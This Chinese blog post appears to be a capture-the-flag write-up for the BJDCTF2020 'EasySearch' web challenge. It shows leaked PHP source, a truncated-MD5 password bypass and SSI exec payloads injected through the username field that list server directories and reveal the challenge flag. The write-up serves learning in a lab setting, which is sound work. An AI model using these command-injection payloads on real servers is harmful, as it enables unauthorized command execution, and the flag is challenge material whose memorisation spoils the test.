BJDCTF2020 EasySearch 1

已于 2025-01-05 16:49:26 修改
阅读量328 收藏 8
点赞数 3
CC 4.0 BY-SA版权
文章标签: android
于 2025-01-05 16:44:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/hddi1/article/details/144947613

#目录扫描 #SSI注入

前置知识

[[SSI注入]] 怎么知道哪里会产生ssi 这里我单开文章

做题

扫目录 得index.php.swp文件
去访问 得到
请添加图片描述

看到".shtml" ssi注入 注入点也提示了

Hello,‘.$_POST[‘username’].’

查看页面源码
请添加图片描述

<?php

    ob_start();

    function get_hash(){

        $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';

        $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times

        $content = uniqid().$random;

        return sha1($content);

    }

    header("Content-Type: text/html;charset=utf-8");

    ***

    if(isset($_POST['username']) and $_POST['username'] != '' )

    {

        $admin = '6d0bc1';

        if ( $admin == substr(md5($_POST['password']),0,6)) {

            echo "<script>alert('[+] Welcome to manage system')</script>";

            $file_shtml = "public/".get_hash().".shtml";

            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");

            $text = '

            ***

            ***

            <h1>Hello,'.$_POST['username'].'</h1>

            ***

            ***';

            fwrite($shtml,$text);

            fclose($shtml);

            ***

            echo "[!] Header  error ...";

        } else {

            echo "<script>alert('[!] Failed')</script>";

    }else

    {

    ***

    }

  
?>

解决MD5截断

我们看这两句

        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6))

显然是MD5截断比较
找到匹配的数字: 656937371
找到匹配的数字: 813355791

我们post传 password=656937371

请添加图片描述

解决ssi文件问题

在这个题中,要做到ssi服务端包含,我们就要去到我们创建的 .shtml页面从而让服务端解析这个页面,执行ssi指令
下面是详细操作:

我们post传username
跟据

<!--#exec cmd="command" -->

我们构造username=<!--#exec cmd="ls" -->

请添加图片描述

看到响应中有url public/f9ec8358858395b9d598ad30b0d6b2b672ba6b60.shtml

我们去访问
得到
请添加图片描述

注意 这里我们可以回想一下前面的代码

function get_hash(){

        $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';

        $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times

        $content = uniqid().$random;

        return sha1($content);

    }

它会每次进行我们post传参时随机创建新的文件名

 $file_shtml = "public/".get_hash().".shtml";

所以每次我们进行命令执行时都要像刚才那样在响应中找到新的url (即上面所说的 我们需要服务端解析的文件->以达到执行我们ssi指令的目的)

因为没有在这发现flag
我们改一下命令 去看看上一级

username=<!--#exec cmd="ls ../"-->&password=656937371

请添加图片描述

去访问 flag_990c66bf85a09c664f0b6741840499b2

请添加图片描述

得到flag

flag{7ae95aea-c092-4445-b50e-8a2965bfe955}

keerduoba
关注
[BJDCTF2020]EasySearch1
qq_45829213的博客
01-26 3105
buuctf 源码泄露 ssi远程命令执行漏洞
BUUCTF web [BJDCTF2020]EasySearch wp
Whaocai的博客
08-02 431
考点 ①ssi注入 进去之后是一个登录框,猜测有没有register.php,经过测试也不存在sql注入。直接御剑扫描(扫buuctf上的题要调线程和超时,我是线程10超时15,不然会被平台禁掉)。扫出来了index.php.swp index.php.swp源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$
BUUCTF-WEB 【BJDCTF2020EasySearch 1
qq_36410265的博客
02-08 470
SSI(服务端包含)
[BJDCTF2020]EasySearch 1
plant1234的博客
05-24 672
[BJDCTF2020]EasySearch 1
[BJDCTF2020]EasySearch1 不会编程的崽
不会编程的崽的博客
02-17 871
dirmap后台文件扫描,shtml ssl注入
BUUCTF [BJDCTF2020]EasySearch1
最新发布
2401_88083440的博客
03-03 718
写一篇文章来学习一下 ssi 注入 以及 dirmap 工具的使用看到这两个框框没什么想法,边探索边扫下目录吧。显示前端报错,先禁用了js,然后又尝试抓了下包,没有发现什么,只好看看扫出来的目录了,最终扫出来了的:index.php.swp (用dirmap扫出来的)虽然两个都显示username,但只有第一个才是真正的$_POST[username]看一下代码逻辑:1.首先判断输入的password 的前6位是否为6d0bc12.如果满足的话就执行打开文件、写入文件、关闭文件的功能。
[BJDCTF2020]EasySearch
夜幕下的灯火阑珊的博客
05-13 1892
知识点 ApacheSSI远程命令执行漏洞 扫描到后台后swp文件泄露,访问一下得到源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+...
BJDCTF2020--web-复现
ChenZIDu的博客
02-21 2860
BJDCTF2020 未完待续 Buu ZJCTF,就这? 看到这题名字还是很不爽的,毕竟我也是个浙江人,不过zjctf,有一说一确实。 BUU上和源题好像有点差别。 进题放出源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_g...
EasySearch
03-16
1. Select some text in JBuilder Editor pane or copy some text into clipboard. 2. Click the Search button in toolbar, it will search the next text from the cursor position. 3. Click the Highlight...
1.buuctf [BJDCTF2020]EasySearch
2401_86760082的博客
02-16 664
进入题目页面如下尝试输入弱口令密码都显示错误看题目是search,扫描一下根目录试试得到源码进行一下代码审计代码仅对用户输入的密码进行 MD5 哈希处理并截取前 6 位与预设的哈希前缀进行比较可以通过简单的暴力破解或彩虹表攻击来找到满足条件的密码由于只需要匹配 MD5 哈希的前 6 位,可以编写脚本,尝试不同的密码组合,计算其 MD5 哈希值并截取前 6 位进行比较,直到找到满足条件的密码或使用预先计算好的 MD5 哈希值和对应的明文密码的彩虹表,查找哈希值前 6 位为6d0bc1的密码。
BUUCTF [BJDCTF2020]EasySearch
qq_53863234的博客
12-05 2944
Apache SSI 远程命令执行漏洞
BUUCTF [BJDCTF2020]EasySearch 1
qq_56313338的博客
09-25 235
.swp” 后缀通常用于表示 Vim(一种文本编辑器)的交换文件。Vim 是一个强大的文本编辑器,它在编辑文件时会创建交换文件以确保文件内容的安全性。
buuCTF [BJDCTF2020]EasySearch 1
weixin_45642610的博客
04-14 2106
buuCTF [BJDCTF2020]EasySearch 1 进去后是这样 扫后台发现index.php.swp备份。 这里吐槽一下。我用dirsearch扫了3次都没出来,最后用dirmap指定字典才出来。网上的字典大部分没包含index.php.swp的,还要自己添加到字典里。 要求password的md5值的前6个字符为6d0bc1。敲代码(python): from hashlib import md5 for i in range(10000000): if md5(str(i).
[BJDCTF2020]EasySearch 1(shtml)
weixin_45577185的博客
10-16 295
扫描到后台后index.php.swp文件泄露,访问一下得到源码 (反正我是没有扫到,wuwuwu~) 可以看到password的md5值的前六位要等于6d0bc1 不会写哈,用用别人的 import hashlib for i in range(1000000000): a = hashlib.md5(str(i).encode('utf-8')).hexdigest() if a[0:6] == '6d0bc1': print(i) print(a)
[BJDCTF2020]JustRE
01-19
### BJDCTF2020 JustRE 挑战赛解题报告 #### 背景介绍 BJDCTF 是由北京邮电大学举办的网络安全竞赛活动之一。JustRE 是其中的一个逆向工程挑战项目,旨在测试参赛者对于二进制文件分析的能力。 #### 题目概述 该...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值